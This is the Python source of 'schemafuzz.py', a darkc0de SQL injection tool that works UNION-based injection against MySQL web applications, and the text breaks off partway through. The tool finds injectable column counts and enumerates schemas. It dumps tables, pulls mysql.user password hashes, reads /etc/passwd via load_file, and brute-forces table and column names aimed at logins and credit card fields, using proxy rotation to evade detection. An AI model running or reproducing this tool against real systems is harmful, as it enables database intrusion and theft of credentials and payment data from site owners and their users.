MySQL Injection Schema, Dataext, and fuzzer (v5) python

1. #!/usr/bin/python
2. ################################################################
3. #       .___             __          _______       .___        #
4. #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
5. #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
6. #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
7. #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
8. #        \/                  \/             \/                 #
9. #                   ___________   ______  _  __                #
10. #                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
11. #                 \  \___|  | \/\  ___/\     /                 #
12. #                  \___  >__|    \___  >\/\_/                  #
13. #      est.2007        \/            \/   forum.darkc0de.com   #
14. ################################################################
15. # MySQL Injection Schema, Dataext, and fuzzer
16.  
17. # Share the c0de!
18.  
19. # Darkc0de Team
20. # www.darkc0de.com
21. # rsauron[at]gmail[dot]com
22.  
23. # Greetz to
24. # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx,
25. # and the darkc0de crew
26.  
27. # NOTES:
28. # Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
29. # The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy
30. # will not be used. This is a effort to keep the script from getting stuck in a endless loop.
31. # Any other questions Hit the forums and ask questions. google is your friend!
32.  
33. # This was written for educational purpose only. Use it at your own risk.
34. # Author will be not responsible for any damage!
35. # Intended for authorized Web Application Pen Testing!
36.  
37. # BE WARNED, THIS TOOL IS VERY LOUD..
38.  
39. #Set default evasion options here
40. arg_end = "--"
41. arg_eva = "+"
42.  
43. #colMax variable for column Finder
44. colMax = 205
45. #Fill in the tables you want tested here.
46. fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
47. #Fill in the columns you want tested here.
48. fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
49.  
50. import urllib, sys, re, os, socket, httplib, urllib2, time, random
51.  
52. #determine platform
53. if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
54.     SysCls = 'clear'
55. elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
56.     SysCls = 'cls'
57. else:
58.     SysCls = 'unknown'
59.  
60. #say hello
61. os.system(SysCls)
62. if len(sys.argv) <= 1:
63.         print "\n|---------------------------------------------------------------|"
64.         print "| rsauron[@]gmail[dot]com                                v5.0   |"
65.         print "|   6/2008      schemafuzz.py                                   |"
66.         print "|      -MySQL v5+ Information_schema Database Enumeration       |"
67.         print "|      -MySQL v4+ Data Extractor                                |"
68.         print "|      -MySQL v4+ Table & Column Fuzzer                         |"
69.         print "| Usage: schemafuzz.py [options]                                |"
70.         print "|                      -h help                    darkc0de.com  |"
71.         print "|---------------------------------------------------------------|\n"
72.         sys.exit(1)
73.            
74.  
75. #help option
76. for arg in sys.argv:
77.         if arg == "-h":
78.                 print "   Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com"
79.                 print "\tModes:"
80.                 print "\tDefine: --dbs     Shows all databases user has access too.               MySQL v5+"
81.                 print "\tDefine: --schema  Enumerate Information_schema Database.                 MySQL v5+"
82.                 print "\tDefine: --full    Enumerates all databases information_schema table      MySQL v5+"
83.                 print "\tDefine: --dump    Extract information from a Database, Table and Column. MySQL v4+"
84.                 print "\tDefine: --fuzz    Fuzz Tables and Columns.                               MySQL v4+"
85.                 print "\tDefine: --findcol Finds Columns length of a SQLi                         MySQL v4+"
86.                 print "\tDefine: --info    Gets MySQL server configuration only.                  MySQL v4+"
87.                 print "\n\tRequired:"
88.                 print "\tDefine: -u        URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
89.                 print "\n\tMode dump and schema options:"
90.                 print "\tDefine: -D        \"database_name\""
91.                 print "\tDefine: -T        \"table_name\""
92.                 print "\tDefine: -C        \"column_name,column_name...\""
93.                 print "\n\tOptional:"
94.                 print "\tDefine: -p        \"127.0.0.1:80 or proxy.txt\""
95.                 print "\tDefine: -o        \"ouput_file_name.txt\"        Default is schemafuzzlog.txt"
96.                 print "\tDefine: -r        row number to start at"
97.                 print "\tDefine: -v        Verbosity off option. Will not display row #'s in dump mode."  
98.                 print "\n   Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
99.                 print "   Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
100.                 print "   Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
101.                 print "   Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
102.                 print "   Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
103.                 print "   Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
104.                 sys.exit(1)
105.  
106. #define varablies
107. site = ""
108. dbt = "schemafuzzlog.txt"
109. proxy = "None"
110. count = 0
111. arg_table = "None"
112. arg_database = "None"
113. arg_columns = "None"
114. arg_row = "Rows"
115. arg_verbose = 1
116. darkc0de = "concat(0x1e,0x1e,"
117. mode = "None"
118. line_URL = ""
119. count_URL = ""
120. gets = 0
121. cur_db = ""
122. cur_table = ""
123. table_num = 0
124. terminal = ""
125. num = 0
126.  
127.  
128. #Check args
129. for arg in sys.argv:
130.     if arg == "-u":
131.         site = sys.argv[count+1]
132.     elif arg == "-o":
133.         dbt = sys.argv[count+1]
134.     elif arg == "-p":
135.         proxy = sys.argv[count+1]
136.     elif arg == "--dump":
137.                 mode = arg
138.                 arg_dump = sys.argv[count]
139.         elif arg == "--full":
140.                 mode = arg
141.         elif arg == "--schema":
142.                 mode = arg
143.                 arg_schema = sys.argv[count]
144.         elif arg == "--dbs":
145.                 mode = arg
146.                 arg_dbs = sys.argv[count]
147.         elif arg == "--fuzz":
148.                 mode = arg
149.                 arg_fuzz = sys.argv[count]
150.         elif arg == "--info":
151.                 mode = arg
152.                 arg_info = sys.argv[count]
153.         elif arg == "--findcol":
154.                 mode = arg
155.                 arg_findcol = sys.argv[count]
156.     elif arg == "-D":
157.         arg_database = sys.argv[count+1]
158.     elif arg == "-T":
159.         arg_table = sys.argv[count+1]
160.     elif arg == "-C":
161.         arg_columns = sys.argv[count+1]
162.     elif arg == "-end":
163.                 arg_end = sys.argv[count+1]
164.                 if arg_end == "--":
165.                         arg_eva = "+"
166.                 else:
167.                         arg_eva = "/**/"
168.     elif arg == "-r":
169.                 num = sys.argv[count+1]
170.                 table_num = num
171.         elif arg == "-v":
172.                 arg_verbose = sys.argv[count]
173.                 arg_verbose = 0
174.     count+=1
175.  
176. #Title write
177. file = open(dbt, "a")
178. print "\n|---------------------------------------------------------------|"
179. print "| rsauron[@]gmail[dot]com                                v5.0   |"
180. print "|   6/2008      schemafuzz.py                                   |"
181. print "|      -MySQL v5+ Information_schema Database Enumeration       |"
182. print "|      -MySQL v4+ Data Extractor                                |"
183. print "|      -MySQL v4+ Table & Column Fuzzer                         |"
184. print "| Usage: schemafuzz.py [options]                                |"
185. print "|                      -h help                    darkc0de.com  |"
186. print "|---------------------------------------------------------------|"
187. file.write("\n|---------------------------------------------------------------|")
188. file.write("\n| rsauron[@]gmail[dot]com                                v5.0   |")
189. file.write("\n|   6/2008      schemafuzz.py                                   |")
190. file.write("\n|      -MySQL v5+ Information_schema Database Enumeration       |")
191. file.write("\n|      -MySQL v4+ Data Extractor                                |")
192. file.write("\n|      -MySQL v4+ Table & Column Fuzzer                         |")
193. file.write("\n| Usage: schemafuzz.py [options]                                |")
194. file.write("\n|                      -h help                    darkc0de.com  |")
195. file.write("\n|---------------------------------------------------------------|")
196.  
197. #Arg Error Checking
198. if site == "":
199.         print "\n[-] Must include -u flag and specify a mode."
200.         print "[-] For help -h\n"
201.         sys.exit(1)
202. if mode == "None":
203.         print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol."
204.         print "[-] For help -h\n"
205.         sys.exit(1)
206. if mode == "--schema" and arg_database == "None":
207.         print "[-] Must include -D flag!"
208.         print "[-] For Help -h\n"
209.         sys.exit(1)
210. if mode == "--dump":
211.         if arg_table == "None" or arg_columns == "None":
212.                 print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
213.                 print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
214.                 print "[-] For help -h\n"
215.                 sys.exit(1)
216. if mode != "--findcol" and site.find("darkc0de") == -1:
217.     print "\n[-] Site must contain \'darkc0de\'\n"
218.     sys.exit(1)
219. if proxy != "None":
220.         if len(proxy.split(".")) == 2:
221.                 proxy = open(proxy, "r").read()
222.         if proxy.endswith("\n"):
223.                 proxy = proxy.rstrip("\n")
224.         proxy = proxy.split("\n")
225. if arg_columns != "None":
226.         arg_columns = arg_columns.split(",")
227. if site[:7] != "http://":
228.     site = "http://"+site
229. if site.endswith("/*"):
230.     site = site.rstrip('/*')
231. if site.endswith("--"):
232.     site = site.rstrip('--')
233.    
234. #Getting the URL ready with the evasion options we selected
235. site = site.replace("+",arg_eva)
236. site = site.replace("/**/",arg_eva)
237. print "\n[+] URL:",site+arg_end
238. file.write("\n\n[+] URL:"+site+arg_end+"\n")
239. print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\""
240. file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"")
241. print "[+] %s" % time.strftime("%X")
242. file.write("\n[+] %s" % time.strftime("%X"))
243.  
244. #Build proxy list
245. socket.setdefaulttimeout(20)
246. proxy_list = []
247. if proxy != "None":
248.     file.write("\n[+] Building Proxy List...")
249.     print "[+] Building Proxy List..."
250.     for p in proxy:
251.         try:
252.             proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
253.             opener = urllib2.build_opener(proxy_handler)
254.             gets+=1
255.             opener.open("http://www.google.com")
256.             proxy_list.append(urllib2.build_opener(proxy_handler))
257.             file.write("\n\tProxy:"+p+"- Success")
258.             print "\tProxy:",p,"- Success"
259.         except:
260.             file.write("\n\tProxy:"+p+"- Failed")
261.             print "\tProxy:",p,"- Failed"
262.             pass
263.     if len(proxy_list) == 0:
264.         print "[-] All proxies have failed. App Exiting"
265.         sys.exit(1)
266.     print "[+] Proxy List Complete"
267.     file.write("\n[+] Proxy List Complete")
268. else:
269.     print "[-] Proxy Not Given"
270.     file.write("\n[+] Proxy Not Given")
271.     proxy_list.append(urllib2.build_opener())
272. proxy_num = 0
273. proxy_len = len(proxy_list)
274.  
275. #colFinder
276. if mode == "--findcol":
277.         print "[+] Attempting To find the number of columns..."
278.         file.write("\n[+] Attempting To find the number of columns...")
279.         print "[+] Testing: ",
280.         file.write("\n[+] Testing: ",)
281.         checkfor=[]
282.         sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
283.         makepretty = ""
284.         for x in xrange(0,colMax):
285.                 try:
286.                         sys.stdout.write("%s," % (x))
287.                         file.write(str(x)+",")
288.                         sys.stdout.flush()
289.                         darkc0de = "dark"+str(x)+"c0de"
290.                         checkfor.append(darkc0de)  
291.                         if x > 0:
292.                                 sitenew += ","
293.                         sitenew += "0x"+darkc0de.encode("hex") 
294.                         finalurl = sitenew+arg_end
295.                         gets+=1
296.                         proxy_num+=1
297.                         source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
298.                         for y in checkfor:
299.                                 colFound = re.findall(y,source)
300.                                 if len(colFound) >= 1:
301.                                         print "\n[+] Column Length is:",len(checkfor)
302.                                         file.write("\n[+] Column Length is: "+str(len(checkfor)))
303.                                         nullcol = re.findall(("\d+"),y)
304.                                         print "[+] Found null column at column #:",nullcol[0]
305.                                         file.write("\n[+] Found null column at column #: "+nullcol[0])
306.                                         for z in xrange(0,len(checkfor)):
307.                                                 if z > 0:
308.                                                         makepretty += ","
309.                                                 makepretty += str(z)
310.                                         site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
311.                                         print "[+] SQLi URL:",site+arg_end
312.                                         file.write("\n[+] SQLi URL: "+site+arg_end)
313.                                         site = site.replace(","+nullcol[0]+",",",darkc0de,")
314.                                         site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
315.                                         site = site.replace(","+nullcol[0],",darkc0de")
316.                                         print "[+] darkc0de URL:",site
317.                                         file.write("\n[+] darkc0de URL: "+site)
318.                                         print "[-] Done!\n"
319.                                         file.write("\n[-] Done!\n")
320.                                         sys.exit(1)
321.                 except (KeyboardInterrupt, SystemExit):
322.                         raise
323.                 except:
324.                         pass
325.                        
326.         print "\n[!] Sorry Column Length could not be found."
327.         file.write("\n[!] Sorry Column Length could not be found.")
328.         print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
329.         print "[-] Done\n"
330.         sys.exit(1)
331.  
332. #Retireve version:user:database
333. head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
334. print "[+] Gathering MySQL Server Configuration..."
335. file.write("\n[+] Gathering MySQL Server Configuration...\n")
336.  
337. while 1:
338.     try:
339.                 gets+=1
340.         source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
341. # Uncomment the following lines to debug issues with gathering server information
342. #       print head_URL
343. #       print source
344.         match = re.findall("\x1e\x1e\S+",source)
345.         if len(match) >= 1:
346.             match = match[0][2:].split("\x1e")
347.             version = match[0]
348.             user = match[1]
349.             database = match[2]
350.             print "\tDatabase:", database
351.             print "\tUser:", user
352.             print "\tVersion:", version
353.             file.write("\tDatabase: "+database+"\n")   
354.             file.write("\tUser: "+user+"\n")
355.             file.write("\tVersion: "+version)
356.                         version = version[0]
357.                         break
358.         else:
359.             print "[-] No Data Found"
360.             sys.exit(1)
361.     except (KeyboardInterrupt, SystemExit):
362.             raise
363.     except:
364.         proxy_num+=1
365.  
366. # Do we have Access to MySQL database and Load_File
367. if mode == "--info":
368.         head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
369.         gets+=1
370.         proxy_num+=1
371.         #print "Debug:",head_URL
372.         source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
373.         match = re.findall("darkc0de",source)
374.         if len(match) >= 1:
375.                 yesno = "Yes <-- w00t w00t"
376.         else:
377.                 yesno = "No"
378.         print "\n[+] Do we have Access to MySQL Database:",yesno
379.         file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
380.         if yesno == "Yes <-- w00t w00t":
381.                 print "[!]",site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
382.                 file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
383.         gets+=1
384.         proxy_num+=1
385.         head_URL = site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
386.         #print "Debug:",head_URL
387.         source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
388.         match = re.findall("root:x:",source)
389.         match = re.findall("root:*:",source)
390.         if len(match) >= 1:
391.                 yesno = "Yes <-- w00t w00t"
392.         else:
393.                 yesno = "No"
394.         print "\n[+] Do we have Access to Load_File:",yesno
395.         file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
396.         if yesno == "Yes <-- w00t w00t":
397.                 print "[!]",site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
398.                 file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end)
399.  
400. #lets check what we can do based on version
401. if mode == "--schema" or mode == "--dbs" or mode == "--full":
402.         if int(version) == 4:
403.                 print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!"
404.                 print "[-] -h for help"
405.                 sys.exit(1)
406. #Build URLS
407. if mode == "--schema":
408.     if arg_database != "None" and arg_table == "None":
409.                 print "[+] Showing Tables & Columns from database \""+arg_database+"\""
410.                 file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
411.             line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
412.                 line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
413.                 count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
414.                 count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
415.                 arg_row = "Tables"
416.         if arg_database != "None" and arg_table != "None":
417.                 print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
418.                 file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
419.             line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
420.                 line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
421.         line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
422.                 count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
423.                 count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
424.         count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
425.         arg_row = "Columns"
426. elif mode == "--dump":                
427.     print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
428.     print "[+] and Column(s) "+str(arg_columns)
429.     file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
430.         file.write("\n[+] Column(s) "+str(arg_columns))
431.         for column in arg_columns:
432.                 darkc0de += column+",0x1e,"
433.     count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
434.     count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
435.     line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
436.     line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
437.         if int(version) == 4:
438.                 count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
439.                 count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
440.             line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
441.                 line_URL += arg_eva+"FROM"+arg_eva+arg_table
442. elif mode == "--full":
443.     print "[+] Starting full SQLi information_schema enumeration..."
444.     line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
445.     line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")
446.        
447. elif mode == "--dbs":
448.     print "[+] Showing all databases current user has access too!"
449.     file.write("\n[+] Showing all databases current user has access too!")
450.         count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
451.         count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
452.     line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
453.     line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
454.     arg_row = "Databases"
455. line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end
456.  
457. #Uncomment the lines below to debug issues with the line_URL or count_URL
458. #print "URL for Counting rows in column:",count_URL
459. #print "URL for exploit:",line_URL
460.  
461. #Fuzz table/columns
462. if mode == "--fuzz":
463.         print "[+] Number of tables names to be fuzzed:",len(fuzz_tables)
464.         file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
465.         print "[+] Number of column names to be fuzzed:",len(fuzz_columns)
466.         file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
467.         print "[+] Searching for tables and columns..."
468.         file.write("\n[+] Searching for tables and columns...")
469.         fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
470.         for table in fuzz_tables:
471.                 try:
472.                         proxy_num+=1
473.                         table_URL = fuzz_URL.replace("TABLE",table)
474.                         gets+=1
475.                         #print "[!] Table Debug:",table_URL
476.                         source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
477.                         e = re.findall("darkc0de", source)
478.                         if len(e) > 0:
479.                                 print "\n[!] Found a table called:",table
480.                                 file.write("\n\n[+] Found a table called: "+str(table))
481.                                 print "\n[+] Now searching for columns inside table \""+table+"\""
482.                                 file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
483.                                 for column in fuzz_columns:
484.                                         try:
